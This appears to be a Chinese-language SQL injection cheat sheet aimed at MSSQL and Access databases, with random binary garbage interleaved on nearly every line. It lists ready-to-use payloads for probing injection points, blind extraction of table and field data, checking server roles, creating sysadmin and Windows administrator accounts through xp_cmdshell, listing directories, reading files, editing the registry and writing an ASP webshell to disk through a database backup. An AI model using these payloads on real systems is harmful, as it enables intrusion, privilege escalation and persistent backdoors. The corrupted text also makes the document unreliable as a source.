1.判断是否有注入;and 1=1 ;and 1=2 Xq��"E�s��
2.初步判断是否是mssql ;and user>0 z�QUNv�PYM
�.[s6�PzQy
3.注入参数是字符'and [查询条件] and ''=' g@pK9R%wH<
�J� H���V�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' Q'?�VLv�|@
$ �f�||!�g
5.判断数据库系统 �f9+6��g�Y
S�,f#�g�?V
;and (select count(*) from sysobjects)>0 mssql �woF�{O)~X
)J�2UNIgN
;and (select count(*) from msysobjects)>0 access 1/6}E�]-F�
DF-.|-�^9I
B}�K<L�\S�
J,s:CBCGL�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 FMzG6nrdBN
"� BLJh)�i
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 N�b�CIL8f]
P
m&�^rC�;
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 2 z�G;9�1^
��=WEDQ\ c
9.(1)猜字段的ascii值(access) `��.]oH�1\
nT(AO-Ue^�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �I1s$\NZ~]
�lhf5[Rp�
(2)猜字段的ascii值(mssql) �#�\O'*m�z
QIJ/'7��2�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 n�</Rd��=
=��}Q|#��C
10.测试权限结构(mssql) �D� �5:'2i
�sM%l:F�v�
���8-cuaa
�2 g�ca��*
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- :"�b��:uQ
6\�.LG4@LO
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- \'|�t>|zhp
�$I�l�����
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- }w�I�+e�Mr
$u�b0$S/Hu
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- D��G&aF�mC
a�=v���H:D
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- WG�yPyG#Fl
��W1ndb:��
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- rj�?�c����
Ug4o�2n0sk
;and 1=(select IS_MEMBER('db_owner'));-- /;!�I.�|j�
Xn>>hzj-x?
/x��_�AWnU
�e-1G\��}E
11.添加mssql和系统的帐户 W�L�ta{A?
0O-"t�P8o�
;exec master.dbo.sp_addlogin username;-- �( ��)f�)
;exec master.dbo.sp_password null,username,password;-- m�'k>���U4
uy�Ww3>���
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- "5?1��S-Vl
�_j��*I\�
;exec master.dbo.xp_cmdshell 'net user username password 2U�"2L^oKI
:JZV=�@<T�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- \+0l��#t$�
I[w5V�;>�*
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ![J_6�f}�!
~�k}O"�{
y
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ��SU�W�=-M
A>H�CX� 4i
7�W�5C�m�\
3-kL0�Q[�"
12.(1)遍历目录 s�Y�v�lf�0
vo2G��Fo��
;create table dirs(paths varchar(100), id int) @�2-;,VL�3
��9�`? M-U
;insert dirs exec master.dbo.xp_dirtree 'c:\' W5~�!)Ec��
:_�=YH�+bZ
;and (select top 1 paths from dirs)>0 6s
~!B�{�Q
.])X�.7@x�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) :VL�YF$�|�
c��%(Nd��i
R�|`�`A5zQ
A.�.`?o�Gj
(2)遍历目录 !,�]c}Y{�i
[F(iV�[n%�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �G�2+� gEg
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 $M�+�'jjnP
BQ70<m�2D$
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �d\t�Y-X3�
�F�V,aQ#��
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �k���`�5K&
)�|AxQP��d
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 -�})zRL0!'
K@
�&;f(�Y
M�-q5Jf��m
rw���0s$~'
13.mssql中的存储过程 %�L�
��wq.
�%Y5F@=>�&
xp_regenumvalues 注册表根键, 子键 3f�~�zn�O
2iO�YC0`�!
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �]D�=fvvST
tD�fHO�1pS
xp_regread 根键,子键,键值名 �475g-t2"@
XD_!5+\H�1
;exec xp_regread h^��''u�e"
W
)�Ps2���
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 '*
/$�6�6|
y�7GgTC/�H
xp_regwrite 根键,子键, 值名, 值类型, 值 ,ei=�w�,�O
����T�7O�)
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 %�=\*OI�hl
�jpTk��@��
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 oL<5�hN*D
_#{qD�G=��
xp_regdeletevalue 根键,子键,值名 ���?C ����
?I"?�J/zm
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �u]ps-R_$G
�XV`8V���b
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ;�d]���vAj
o��J��/=&c
s��B��qOcy
02T'�B&&~�
14.mssql的backup创建webshell ,�q{~l�f�-
9���>`dB�
use model *&�R|0I{>
V)ag ss w?
create table cmd(str image); v$�5D�&Tv
{� 9\/aXPS
insert into cmd(str) values (''); 2�t�45/:,�
�.C ,d�V7
backup database model to disk='c:\l.asp'; b^P�\Q s*m
#uIC�H��t3
��|B64%w>Y
�036�QV M$
15.mssql内置函数 mQ:YHtHE.F
a�$bE2'�cb
;and (select @@version)>0 获得Windows的版本号 +kD ��JZ��
+>��$Kmy[3
;and user_name()='dbo' 判断当前系统的连接用户是不是sa s'I�B{lJ�9
l
m(mY$B*_
;and (select user_name())>0 爆当前系统的连接用户 �kf9��]nIo
imh�E=��6{
;and (select db_name())>0 得到当前连接的数据库 {G�<1.����
�1F3�Q�^3+
YN��KvR��
W�� �,�v0~
16.简洁的webshell �*O�)�i)["
iW�W
>]3�Q
use model /WK1�(�B:�
UQ@s�zE���
create table cmd(str image); &0J8I��Cd=
u|D �L?c>W
insert into cmd(str) values (''); ��E]r<t�#�
KDA2
�H>
backup database model to disk='g:\wwwtest\l.asp';
